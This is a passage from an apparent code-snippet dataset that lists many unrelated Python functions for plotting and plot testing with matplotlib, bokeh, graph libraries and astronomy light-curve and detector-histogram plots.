tmp_path.joinpath(\"projection.png\")\n logfile = tmp_path.joinpath(\"plot.log\")\n result = script_runner.run(\n \"qaa\",\n \"plot\",\n \"-i\",\n \"test.csv\",\n \"-o\",\n outfile.as_posix(),\n \"-l\",\n logfile.as_posix(),\n \"--pca\",\n \"--verbose\",\n )\n assert not result.success\n assert not logfile.exists()\n assert not outfile.exists()", "def test_path(self, x_path, y_path):\n\t\tplt.plot(x_path, y_path, 'bo')\n\t\tplt.plot(x_path, y_path, 'b-')\n\t\tplt.show()", "def evaluate(self, plot):", "def plot(self, *args, **kwargs):\n pass", "def test_make_plot_ui(self):\n print(sys._getframe().f_code.co_name)\n try:\n x = np.arange(0,6)*300000\n y = np.arange(0,6)\n pp.make_plot(x,y,plot_type='ui')\n except Exception as e:\n raise\n plt.close('all')", "def make_plot(x,y):", "def test_make_plot_invalid_plot_type(self):\n print(sys._getframe().f_code.co_name)\n x = np.arange(0,6)*300000\n y = np.arange(0,6)\n self.assertRaises(Exception,pp.make_plot,x,y,plot_type='wrong',msg='Invalid plot type')", "def test_plt_status():\n\n ta = WATA()\n wata_data = define_testdata()\n ta.source = ColumnDataSource(data=wata_data)\n ta.add_time_column()\n ta.setup_date_range()\n result = ta.plt_status()\n\n assert bokeh_plot_type == type(result)", "def plot_data(self):", "def test_plot_graphs(self):\n\n # Graphs who are not embedded, i.e., have no coordinates.\n COORDS_NO = {\n 'Graph',\n 'BarabasiAlbert',\n 'ErdosRenyi',\n 'FullConnected',\n 'RandomRegular',\n 'StochasticBlockModel',\n }\n\n # Coordinates are not in 2D or 3D.\n COORDS_WRONG_DIM = {'ImgPatches'}\n\n Gs = []\n for classname in set(graphs.__all__) - COORDS_NO - COORDS_WRONG_DIM:\n Graph = getattr(graphs, classname)\n\n # Classes who require parameters.\n if classname == 'NNGraph':\n Xin = np.arange(90).reshape(30, 3)\n Gs.append(Graph(Xin))\n elif classname in ['ImgPatches', 'Grid2dImgPatches']:\n Gs.append(Graph(img=self._img, patch_shape=(3, 3)))\n elif classname == 'LineGraph':\n Gs.append(Graph(graphs.Sensor(20, seed=42)))\n else:\n Gs.append(Graph())\n\n # Add more test cases.\n if classname == 'TwoMoons':\n Gs.append(Graph(moontype='standard'))\n Gs.append(Graph(moontype='synthesized'))\n elif classname == 'Cube':\n Gs.append(Graph(nb_dim=2))\n Gs.append(Graph(nb_dim=3))\n elif classname == 'DavidSensorNet':\n Gs.append(Graph(N=64))\n Gs.append(Graph(N=500))\n Gs.append(Graph(N=128))\n\n for G in Gs:\n self.assertTrue(hasattr(G, 'coords'))\n self.assertEqual(G.N, G.coords.shape[0])\n\n signal = np.arange(G.N) + 0.3\n\n G.plot(backend='pyqtgraph')\n G.plot(backend='matplotlib')\n G.plot(signal, backend='pyqtgraph')\n G.plot(signal, backend='matplotlib')\n plotting.close_all()", "def _plot_init(self):\n pass", "def _plot_init(self):\n pass", "def plot(self, *args, **kwargs):\n raise NotImplementedError", "def plot(self):\n raise Exception(\"pure virtual function\")", "def test_signature(self, method):\n fig = plt.figure()\n ax_test = fig.add_subplot(projection=\"ternary\")\n ax_ref = fig.add_subplot()\n signature_test = inspect.signature(getattr(ax_test, method))\n signature_ref = inspect.signature(getattr(ax_ref, method))\n assert signature_test == signature_ref", "def test_plot_color(self):\n lname = os.path.join(self.datadir,\n 'monol_testA_nustar_fpma_E_10-5_over_5-3') + \\\n HEN_FILE_EXTENSION\n cname = os.path.join(self.datadir,\n 'monol_testA_nustar_fpma_E_10-5_over_5-3') + \\\n HEN_FILE_EXTENSION\n hen.plot.main([cname, lname, '--noplot', '--xlog', '--ylog', '--CCD',\n '-o', 'dummy.qdp'])", "def test_plot_ess_evolution(models):\n idata = models.model_1\n ax = plot_ess(idata, kind=\"evolution\", extra_kwargs={\"linestyle\": \"--\"}, color=\"b\")\n assert np.all(ax)", "def test_plot_ppc_ax(models, kind, fig_ax):\n _, ax = fig_ax\n axes = plot_ppc(models.model_1, kind=kind, ax=ax)\n assert np.asarray(axes).item(0) is ax", "def test_plot_drift(self):\n with patch('matplotlib.pyplot.show') as mock: # don't display the figure\n with patch('matplotlib.pyplot.savefig') as mock2: # don't display the figure\n times = (datetime.datetime(2000, 1, 1), datetime.datetime(2000, 1, 2), datetime.datetime(2000, 1, 3))\n ref_ratio = (0, 0, 0)\n plot = librad_drift.RadiometricDrift.plot_radiometric_drift\n drift = plot(times, ref_ratio, 'target', 'reference', band=0, doplot=False)\n self.assertEqual(drift, 0)", "def test_plot1(plot=1, version='scalar'):\n Lx = 10\n Ly = 10\n c = 1.0\n\n def I2(x, y):\n return exp(-(x-Lx/2.0)**2/2.0 -(y-Ly/2.0)**2/2.0)\n def f(x, y, t):\n return 0.0\n def bc(x, y, t):\n return 0.0\n\n I2 = StringFunction('exp(-(x-Lx/2.0)**2/2.0 -(y-Ly/2.0)**2/2.0)',\n independent_variables=('x', 'y'),\n Lx=Lx, Ly=Ly, globals=globals())\n f = StringFunction('0.0', independent_variables=('x', 'y', 't'),\n globals=globals())\n bc = StringFunction('0.0', independent_variables=('x', 'y', 't'),\n globals=globals())\n if plot:\n g = Gnuplot.Gnuplot(persist=1)\n g('set parametric')\n g('set data style lines')\n g('set hidden')\n g('set contour base')\n g('set zrange [-0.7:0.7]') # nice plot...\n \n def action(u, xv, yv, t):\n #print 'action, t=',t,'\\nu=',u, '\\nx=',x, '\\ny=', y\n if plot:\n data = Gnuplot.GridData(u, xv[:,0], yv[0,:], binary=0)\n g.splot(data)\n g('set title \"t=%g\"' % t)\n if plot == 2:\n g.hardcopy(filename='tmp_%020f.ps' % t, enhanced=1, mode='eps',\n color=0, fontname='Times-Roman', fontsize=14)\n time.sleep(1)\n time.sleep(0.2) # pause between frames\n\n implementation = {'ic': version, 'inner': version, 'bc': version}\n nx = 40; ny = 40; tstop = 20 # tstop = 700\n print 'test_plot1:', f, bc, I2\n dt, t_ic, t_inner, t_bc = \\\n solver(I2, f, c, bc, Lx, Ly, nx, ny, 0, tstop,\n user_action=action, implementation=implementation)\n print 'time ic: %s, time scheme: %s, time bc: %s' % (t_ic, t_inner, t_bc)\n time.sleep(3)", "def plot_graph(self) -> None:", "def test_bore_smoke():\n gef = read_bore(os.path.join(BasePath, \"../test_files/example_bore.gef\"))\n axes = plotting.plot_bore(gef)\n assert isinstance(axes, plt.Axes)", "def setUp(self):\n\n self.plot = spotify_analysis.Plot(\"data/test.csv\")", "def test_plot_images(self):\n save_file(self.quart.plot_images)", "def test_get_run_plot(self):\n plot = plots.get_run_plot('h', NOMINAL_RUN)\n self.assertEqual(plot['data']['title'], 'h_nom')", "def test_exercise_1():\n a, b = 5, 0\n fvals = []\n grid = np.linspace(-3, 4)\n for value in grid:\n fvals.append(get_test_function(value, a, b))\n plt.plot(grid, fvals)", "def testing():\n\n\n valueDumpFile1 = open(\"datasets/bbc/politics.pickle\",\"rb\")\n #pickle.dump(plot1,valueDumpFile1)\n plot1=pickle.load(valueDumpFile1)\n valueDumpFile1 = open(\"datasets/bbc/business.pickle\",\"rb\")\n #pickle.dump(plot2,valueDumpFile1)\n plot2=pickle.load(valueDumpFile1)\n valueDumpFile1 = open(\"datasets/bbc/tech.pickle\",\"rb\")\n #pickle.dump(plot3,valueDumpFile1)\n plot3=pickle.load(valueDumpFile1)\n valueDumpFile1 = open(\"datasets/bbc/entertainment.pickle\",\"rb\")\n #pickle.dump(plot4,valueDumpFile1)\n plot4=pickle.load(valueDumpFile1)\n valueDumpFile1 = open(\"datasets/bbc/sport.pickle\", \"rb\")\n #pickle.dump(plot5, valueDumpFile1)\n plot5=pickle.load(valueDumpFile1)\n total = []\n for d in plot1:\n total.append(d)\n for d in plot2:\n total.append(d)\n\n for d in plot3:\n total.append(d)\n for d in plot4:\n total.append(d)\n\n for d in plot5:\n total.append(d)\n fig = plt.figure()\n ax = plt.subplot(111)\n\n #ax.scatter(plot1[:,0],plot1[:,1],s=5,linewidths=5)\n line1=ax.plot(plot1[:,0],plot1[:,1],\"bo\",label=\"Politics\")\n line2=ax.plot(plot2[:,0],plot2[:,1],\"ro\",label='Business')\n line3=ax.plot(plot3[:,0],plot3[:,1],\"go\",label=\"Tech\")\n line4=plt.plot(plot4[:,0],plot4[:,1],\"yo\",label=\"Entertainment\")\n line4 = plt.plot(plot5[:, 0], plot5[:, 1], \"ko\", label=\"sport\")\n ax.legend()\n fig.add_subplot(ax)\n #fig.add_subplot(aq)\n print(total)\n plt.show()\n\n\n \"\"\"\n temp=open(\"datasets/bbc/002.txt\",\"r\")\n plotValue,correspondingWord=im.plotDocumentWords(temp)\n plotValue= np.array(plotValue)\n \"\"\"\n colors = 100*[\"r\",\"g\",\"b\",\"c\",\"k\",\"l\",\"p\"]\n (classifications,centroids)= kMeans.execute_kmeans(total, k=5, showPlot=True, plotRef=plt)\n x=[]\n y=[]\n \"\"\"\n count = 0\n for centroid in centroids:\n plt.scatter(centroids[centroid][0], centroids[centroid][1], marker=\"o\", color=colors[count], s=100,\n linewidths=5)\n count = count + 1\n \n for classification in classifications:\n color = colors[classification]\n if len(classifications[classification]) > 0:\n for featureSet in classifications[classification]:\n plt.scatter(featureSet[0], featureSet[1], marker=\"x\", color=color, s=100, linewidths=5)\n \n \n for k in plotValue:\n x.append(k[0])\n y.append(k[1])\n #plt.scatter(x,y,linewidths=2,s=5)\n for i in range(len(correspondingWord)):\n xy=(x[i],y[i])\n plt.annotate(correspondingWord[i],xy)\n \"\"\"\n plt.show()", "def main():\r\n plot = Plotter(0.5, 1.2)\r\n plot.plot_func()", "def test_x(self):\n g = gca()\n lines = g.get_lines() \n self.assertEquals(lines[0].get_xdata().tolist(), [3, 5, 5, 3, 3])", "def test_render_xy_plot():\n gdpinfo = {\n \"gdpfile\": \"isp_gdp.csv\",\n \"separator\": \",\",\n \"quote\": '\"',\n \"min_year\": 1960,\n \"max_year\": 2015,\n \"country_name\": \"Country Name\",\n \"country_code\": \"Country Code\"\n }\n\n render_xy_plot(gdpinfo, [], \"isp_gdp_xy_none.svg\")\n render_xy_plot(gdpinfo, [\"China\"], \"isp_gdp_xy_china.svg\")\n render_xy_plot(gdpinfo, [\"United Kingdom\", \"United States\"],\n \"isp_gdp_xy_uk+usa.svg\")\n render_xy_plot(gdpinfo, [\"India\", \"China\", \"United Kingdom\", \"United States\", \"Aruba\", \"Andorra\", \"Angola\", \"Afghanistan\", \"Albania\"], \"isp_gdp_xy_countries.svg\")", "def test_plot():\n fig = plt.figure()\n ax = fig.add_subplot(projection='ternary')\n tn0, tn1, tn2 = get_spiral()\n ax.plot(tn0, tn1, tn2)", "def test_screenshot_then_show():\n vpl.figure()\n vpl.quick_test_plot()\n vpl.screenshot_fig()\n vpl.show()", "def test_line_plot(self):\n clf()\n filename = 'lines_plot.png'\n N = 10\n lines = GeoSeries([LineString([(0, i), (9, i)]) for i in xrange(N)])\n ax = lines.plot()\n self._compare_images(ax=ax, filename=filename)", "def test_link_axes(self):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n splt = SEGYPlotter(ax, self.segy)\n # should add one artist to our axes\n splt.plot_wiggles(wiggle_traces=True)\n self.assertEqual(len(splt.ACTIVE_LINES['wiggle_traces']), 1)\n self.assertTrue('wiggle_traces' not in splt.INACTIVE_LINES)\n self.assertEqual(len(ax.lines), 1)\n # should remove one artist to our axes\n splt.plot_wiggles(wiggle_traces=False)\n self.assertTrue('wiggle_traces' not in splt.ACTIVE_LINES)\n self.assertEqual(len(splt.INACTIVE_LINES['wiggle_traces']), 1)\n self.assertEqual(len(ax.lines), 0)", "def test_plot_npy(self, script_runner: ScriptRunner, tmp_path: Path) -> None:\n outfile = tmp_path.joinpath(\"projection.png\")\n logfile = tmp_path.joinpath(\"plot.log\")\n result = script_runner.run(\n \"qaa\",\n \"plot\",\n \"-i\",\n PROJNP,\n \"-o\",\n outfile.as_posix(),\n \"-l\",\n logfile.as_posix(),\n \"--pca\",\n \"--verbose\",\n )\n assert result.success\n assert logfile.exists()\n assert outfile.exists()\n assert outfile.stat().st_size > 0", "def plot_vis_test(plotfile,pdf_file):\n\t# First some parameters looked up from configfile---------------------------------\n\t\n\tgrbdir = runconf['l2file'][0:10]\n\tpre_tstart = runconf['bkg1start']\n\tpre_tend = runconf['bkg1end']\n\ttrigtime = runconf['trigtime']\n\tgrb_tstart = runconf['transtart']\n\tgrb_tend = runconf['tranend']\n\tpost_tstart = runconf['bkg2start']\n\tpost_tend = runconf['bkg2end']\n\tt_src = grb_tend - grb_tstart \n\tt_tot = (pre_tend-pre_tstart)+(post_tend-post_tstart)\n\tra_tran = runconf['ra']\n\tdec_tran = runconf['dec']\n\tlc_bin = runconf['lc_bin']\n\talpha = runconf['alpha']\n\tbeta = runconf['beta']\n\tE0 = runconf['E0']\n\tA = runconf['A']\n\tsim_scale = t_src\n\tpixbin = int(runconf['pixsize'])\n\tcomp_bin = int(runconf['comp_bin'])\n\ttyp = runconf['typ']\n\n\t# Calling txy to calculate thetax thetay and the coordinates----------------------\n\t\n\tthetax,thetay,x,y,z,t = txy(runconf['mkffile'], trigtime, ra_tran, dec_tran)\n\t\n\t# Plot the 3d visualisation for the position of the transient---------------------\n\tplt.figure()\n\tfig = visualize_3d(grbdir,x,y,z, t, thetax, thetay, grbdir)\t\n\tpdf_file.savefig(fig)\n\t\n\t# Plotting the lightcurves for the four quadrants---------------------------------\n\tfig = plt.figure()\n\tclean_file = fits.open(runconf['infile'])\n\tplt.title('Light curves for '+grbdir + \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n\t\n\tquad0 = clean_file[1].data\n\tdata0,bin_edge = np.histogram(quad0['time'], bins=np.arange(quad0['time'][0],quad0['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data0,label='Quad 0',lw=0.7)\n quad1 = clean_file[2].data\n\tdata1,bin_edge = np.histogram(quad1['time'], bins=np.arange(quad1['time'][0],quad1['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data1,label='Quad 1',lw=0.7) \n\tquad2 = clean_file[3].data\n\tdata2,bin_edge = np.histogram(quad2['time'], bins=np.arange(quad2['time'][0],quad2['time'][-1],lc_bin))\n\tplt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data2,label='Quad 2',lw=0.7)\n quad3 = clean_file[4].data\n data3,bin_edge = np.histogram(quad3['time'], bins=np.arange(quad3['time'][0],quad3['time'][-1],lc_bin))\n plt.plot((bin_edge[:-1]+bin_edge[1:])/2.0,data3,label='Quad 3',lw=0.7)\n\tplt.axvspan(grb_tstart,grb_tend,color='blue',alpha=0.1,label='GRB')\n\tplt.axvspan(pre_tstart,pre_tend,color='orange',alpha=0.2)\n\tplt.axvspan(post_tstart,post_tend,color='orange',alpha=0.2,label='Background')\n\tplt.legend(prop={'size':6})\n\tplt.xlim(pre_tstart-100,post_tend+100)\n\tpdf_file.savefig(fig)\n\t\n\t# Calling the sim_dph--------------------------------------------------------------\n\t\n\tgrb_flat,bkgd_flat,grb_dph,bkgd_dph,t_src,t_total = data_bkgd_image(grbdir,pre_tstart,pre_tend,grb_tstart,grb_tend,post_tstart,post_tend)\n\n\tsim_flat,sim_dph,badpix_mask,sim_err_dph = simulated_dph(grbdir,typ,t_src,alpha,beta,E0,A)\n\n\tsrc_dph = grb_dph-bkgd_dph*t_src/t_tot\n\n print \"Total counts in simulated dph: \",(sim_dph).sum()\n print \"Total counts after badpix mask is applied: \",(sim_dph*badpix_mask).sum()\n\tprint \"Excess counts in badpix masked src dph: \",(src_dph*badpix_mask).sum()\n \n\t# Plotting the DPHs before badpix correction---------------------------------------\n\t\n\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\tplt.suptitle('DPHs before badpix correction for '+grbdir + \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n \t# Sim\n\tim = ax3.imshow(sim_dph,interpolation='none')\n\tax3.set_title('Sim DPH',fontsize=8)\n\tax3.set_xlim(-1,128 - 0.5)\n\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax3.spines['left'].set_position(('data',-0.5))\n\tax3.set_yticklabels([])\n\tax3.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\t\n\t # Source \n\tim = ax4.imshow(src_dph,interpolation='none',vmin=0)\n\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\tax4.set_xlim(-1,128 -0.5)\n\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax4.spines['left'].set_position(('data',-0.5))\n\tax4.set_yticklabels([])\n\tax4.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\n \t# Source + Background\n\tim = ax1.imshow(grb_dph,interpolation='none')\n\tax1.set_title('Src + Bkg DPH',fontsize=8)\n\tax1.set_xlim(-1,128 -0.5)\n\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax1.spines['left'].set_position(('data',-0.5))\n\tax1.set_yticklabels([])\n\tax1.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\n \t# Background\n\tim = ax2.imshow(bkgd_dph*t_src/t_total,interpolation='none')\n\tax2.set_title('Bkg DPH',fontsize=8)\n\tax2.set_xlim(-1,128 -0.5)\n\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax2.spines['left'].set_position(('data',-0.5))\n\tax2.set_yticklabels([])\n\tax2.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\tf.set_size_inches([6.5,6.5])\n\tpdf_file.savefig(f) # saves the current figure into a pdf_file page\n\t\n\t# Plotting the Badpix mask---------------------------------------------\n\n\tfig = plt.figure()\n\tax = plt.subplot(111)\n\tplt.title('Badpix Mask for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n\tim = ax.imshow(badpix_mask,interpolation='none')\n\tax.set_xlim(-9,128 -0.5)\n\tax.axvline(x=-5.,ymin=0,ymax=64,linewidth=5,color='k')\n\tax.spines['left'].set_position(('data',-0.5))\n\tax.xaxis.set_ticks(np.arange(0,128,16))\n\tax.yaxis.set_ticks(np.arange(0,128,16))\n\tfig.colorbar(im,ax=ax,fraction=0.046, pad=0.04)\n\t\n\tpdf_file.savefig(fig) # saves the current figure into a pdf_file page\n\n\t# Plotting badpix masked graphs--------------------------------------------\n\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\tplt.suptitle('DPHs after badpix correction for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay))\n \t# Sim\n\tim = ax3.imshow(sim_dph*badpix_mask,interpolation='none')\n\tax3.set_title('Sim DPH',fontsize=8)\n\tax3.set_xlim(-1,128 -0.5)\n\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax3.spines['left'].set_position(('data',-0.5))\n\tax3.set_yticklabels([])\n\tax3.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\n\t # Source \n\tim = ax4.imshow(src_dph*badpix_mask,interpolation='none',vmin=0)\n\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\tax4.set_xlim(-1,128 -0.5)\n\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax4.spines['left'].set_position(('data',-0.5))\n\tax4.set_yticklabels([])\n\tax4.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\n\t # Source + Background\n\tim = ax1.imshow(grb_dph*badpix_mask,interpolation='none')\n\tax1.set_title('Src + Bkg DPH',fontsize=8)\n\tax1.set_xlim(-1,128 -0.5)\n\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax1.spines['left'].set_position(('data',-0.5))\n\tax1.set_yticklabels([])\n\tax1.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\t\n\t # Background\n\tim = ax2.imshow(bkgd_dph*badpix_mask*t_src/t_total,interpolation='none')\n\tax2.set_title('Bkg DPH',fontsize=8)\n\tax2.set_xlim(-1,128 -0.5)\n\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\tax2.spines['left'].set_position(('data',-0.5))\n\tax2.set_yticklabels([])\n\tax2.xaxis.set_ticks(np.arange(0,128,16))\n\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\tf.set_size_inches([6.5,6.5])\n\tpdf_file.savefig(f) # saves the current figure into a pdf_file page\n\n\t# Plotting badpix masked graphs (Binned) ----------------------------------------------------\n\tfor p in [4,8,16]:\n\t\tf,((ax1,ax2),(ax3,ax4)) = plt.subplots(2,2)\n\t\tplt.suptitle('DPHs after badpix correction for '+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} \".format(tx=thetax,ty=thetay)+ \"pixsize=\"+str(p))\n\t\t # Sim\n\t\tim = ax3.imshow(resample(sim_dph*badpix_mask,p),interpolation='none')\n\t\tax3.set_title('Sim DPH',fontsize=8)\n\t\tax3.set_xlim(-1,128/p -0.5)\n\t\tax3.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax3.spines['left'].set_position(('data',-0.5))\n\t\tax3.set_yticklabels([])\n\t\tax3.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n\t\tax3.set_xticklabels(np.arange(0,128,16))\n\t\tf.colorbar(im,ax=ax3,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Source \n\t\tim = ax4.imshow(resample(src_dph*badpix_mask,p),interpolation='none',vmin=0)\n\t\tax4.set_title('Src DPH (bkg subtracted)',fontsize=8)\n\t\tax4.set_xlim(-1,128/p -0.5)\n\t\tax4.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax4.spines['left'].set_position(('data',-0.5))\n\t\tax4.set_yticklabels([])\n ax4.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax4.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax4,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Source + Background\n\t\tim = ax1.imshow(resample(grb_dph*badpix_mask,p),interpolation='none')\n\t\tax1.set_title('Src + Bkg DPH',fontsize=10)\n\t\tax1.set_xlim(-1,128/p -0.5)\n\t\tax1.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax1.spines['left'].set_position(('data',-0.5))\n\t\tax1.set_yticklabels([])\n ax1.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax1.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax1,fraction=0.046, pad=0.04)\n\t\t\n\t\t # Background\n\t\tim = ax2.imshow(resample(bkgd_dph*badpix_mask*t_src/t_total,p),interpolation='none')\n\t\tax2.set_title('Bkg DPH',fontsize=8)\n\t\tax2.set_xlim(-1,128/p -0.5)\n\t\tax2.axvline(x=-0.75,ymin=0,ymax=64,linewidth=5,color='k')\n\t\tax2.spines['left'].set_position(('data',-0.5))\n\t\tax2.set_yticklabels([])\n ax2.xaxis.set_ticks(np.arange(0,(128/p),16/p))\n ax2.set_xticklabels(np.arange(0,128,16))\t\t\n\t\tf.colorbar(im,ax=ax2,fraction=0.046, pad=0.04)\n\t\tf.set_size_inches([6.5,6.5])\n\t\t\n\t\tpdf_file.savefig(f) # saves the current figure into a pdf_file page\n\n\n\t# Plotting the comparison graphs with equal bins ---------------------------------------\n\tprint \"No. of pixels with zero counts in sim_dph: \",sim_dph[sim_dph==0].size\n\tprint \"No. of pixels with zero counts in grb_dph(no bkg subtration): \",grb_dph[grb_dph==0].size\n\t\n\t# Generating the array for module number ------------------------------------------------\n\tA = ['A'+str(i) for i in range(16)]\n\tB = np.flip(['B'+str(i) for i in range(16)],0)\n\tC = np.flip(['C'+str(i) for i in range(16)],0)\n\tD = ['D'+str(i) for i in range(16)]\n\tquad_a = np.reshape(A,(4,4))\n\tquad_b = np.reshape(B,(4,4))\n\tquad_c = np.reshape(C,(4,4))\n\tquad_d = np.reshape(D,(4,4))\n\tMod_arr = np.ndarray((8,8),dtype='|S3')\n\tMod_arr[:4,:4] = quad_a\n\tMod_arr[:4,4:] = quad_b\n\tMod_arr[4:,4:] = quad_c\n\tMod_arr[4:,:4] = quad_d\n\tMod_names = Mod_arr.flatten()\n\t#print \"Module name array : \",Mod_names\n\t#-----------------------------------------------------------------------------------------\n\t\t\n\tsim_dph = sim_dph*badpix_mask\n\tsim_err_dph = sim_err_dph*badpix_mask\n grb_dph = grb_dph*badpix_mask\n bkgd_dph = bkgd_dph*badpix_mask\n\tgrb_err_dph = np.sqrt(grb_dph)*badpix_mask\n\tbkgd_err_dph = np.sqrt(bkgd_dph)*badpix_mask\n\n\tsim_bin = resample(sim_dph,pixbin)\n\tsim_err_bin = np.sqrt(resample(sim_err_dph**2,pixbin))\t\n\tgrb_bin = resample(grb_dph,pixbin)\n\tbkgd_bin = resample(bkgd_dph,pixbin)\n\tgrb_err_bin = np.sqrt(resample(grb_err_dph,pixbin))\t\n\tbkgd_err_bin = np.sqrt(resample(bkgd_err_dph,pixbin))\t\n\n\tsim_flat_bin = sim_bin.flatten()\n\tsim_err_flat_bin = sim_err_bin.flatten()\n\tgrb_flat_bin = grb_bin.flatten()\n\tbkgd_flat_bin = bkgd_bin.flatten()\n\tgrb_err_flat_bin = grb_err_bin.flatten()\n\tbkgd_err_flat_bin = bkgd_err_bin.flatten()\n\t\n\n\t # Defining model background and data\n\tmodel = sim_flat_bin\n\tmodel_copy = np.copy(model)\n\tbkgd = bkgd_flat_bin*t_src/t_tot\n\tsrc = grb_flat_bin\n\t\n\tdata = src - bkgd\n\tdata_copy = np.copy(data)\n\t\n\terr_src = grb_err_flat_bin\n\terr_bkgd = bkgd_err_flat_bin\n\terr_model = sim_err_flat_bin\n\terr_model_copy = np.copy(err_model)\n\terr_data = np.sqrt(((err_src)**2) + ((err_bkgd)**2)*(t_src/t_total)**2)\n\terr_data_copy = np.copy(err_data)\n\t\n\tratio = data/model\n\terr_ratio = ratio*np.sqrt(((err_data/data)**2) + ((err_model/model)**2))\n\t\n\tchi_sq = (((model-data)**2)/((err_model)**2 + (err_data)**2)).sum()\n\t\n\t # PLotting the comparison plots\n\tf,(ax1,ax2) = plt.subplots(2,gridspec_kw={'height_ratios':[2,1]},sharex='row')\n\t\n\tax1.set_title(\"Comparison between simulated and real data for \"+grbdir+ \"\\n\" + r\"$\\theta_x$={tx:0.1f} and $\\theta_y$={ty:0.1f} $\\chi^2$={c:0.1f}\".format(tx=thetax,ty=thetay,c=chi_sq))\n\tax1.errorbar(np.arange(0,(len(data))),data,yerr=err_data,fmt='.',markersize=2,label=\"Data\",elinewidth=0.5)\n\tax1.errorbar(np.arange(0,(len(model))),model,yerr=err_model,fmt='.',markersize=2,label=\"Simulation\",elinewidth=0.5)\n\tax1.legend()\n ax1.xaxis.set_ticks(np.arange(0,len(data)))\n\tax1.set_ylabel('Counts')\n\tax1.xaxis.grid(linewidth=0.5,alpha=0.3)\n ax1.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n\n\tax2.errorbar(np.arange(0,(len(ratio))),ratio,yerr=err_ratio,fmt='.',markersize=2,label=\"Ratio = Data/Model\",elinewidth=0.5)\n\tax2.xaxis.set_ticks(np.arange(0,len(data)))\n ax2.set_xticklabels(Mod_names,rotation=90,fontsize=5)\n ax2.yaxis.set_ticks(np.arange(int(min(ratio-err_ratio)-1),int(max(ratio+err_ratio)+2),1))\n\tax2.tick_params(labelsize=5)\n\tax2.axhline(y=1,linewidth=0.5,color='k')\n\tax2.legend()\n\tax2.set_xlabel('CZT Modules')\n\tax2.set_ylabel('Ratio of counts')\n\tax2.xaxis.grid(linewidth=0.5,alpha=0.3)\n\tplt.tight_layout(h_pad=0.0)\n\tf.set_size_inches([6.5,10])\n\tpdf_file.savefig(f,orientation='portrait') # saves the current figure into a pdf_file page\n\n\t# Plotting comparison graphs with random binning------------------------------\n\t\n sim_flat = sim_dph.flatten()\n\tsim_err_flat = sim_err_dph.flatten()\n grb_flat = grb_dph.flatten()\n bkgd_flat = bkgd_dph.flatten()\n\tsrc_flat = src_dph.flatten()\n\t\n\torder = np.random.permutation(np.arange(0,len(sim_flat)))\n\t\n sim_flat = sim_flat[order]\n\tsim_err_flat = sim_err_flat[order]\n\tgrb_flat = grb_flat[order]\n\tbkgd_flat = bkgd_flat[order]\n\tsrc_flat = src_flat[order]\n\t\n\tprint \"No. of pixels with zero counts in sim_flat: \",sim_flat[sim_flat==0].size\n\tprint \"No. of pixels with zero counts in src_flat: \",src_flat[src_flat==0].size\n\t\n\tbins = np.array(np.sort(np.random.uniform(0,1,comp_bin)*len(sim_flat)),dtype=np.int64)\n\tx = np.zeros(len(bins)+2,dtype=np.int64)\n\tx[0] = 0\n\tx[-1] = len(sim_flat)\n\tx[1:-1] = bins\n\t\n\t#print \"The bin edges: \",x # ---------------------------------------------------------------\n\t\n\tsim_flat_bin = np.array([sim_flat[x[i]:x[i+1]].sum() for i in range(comp_bin+1)])\n\tsim_err_flat_bin = 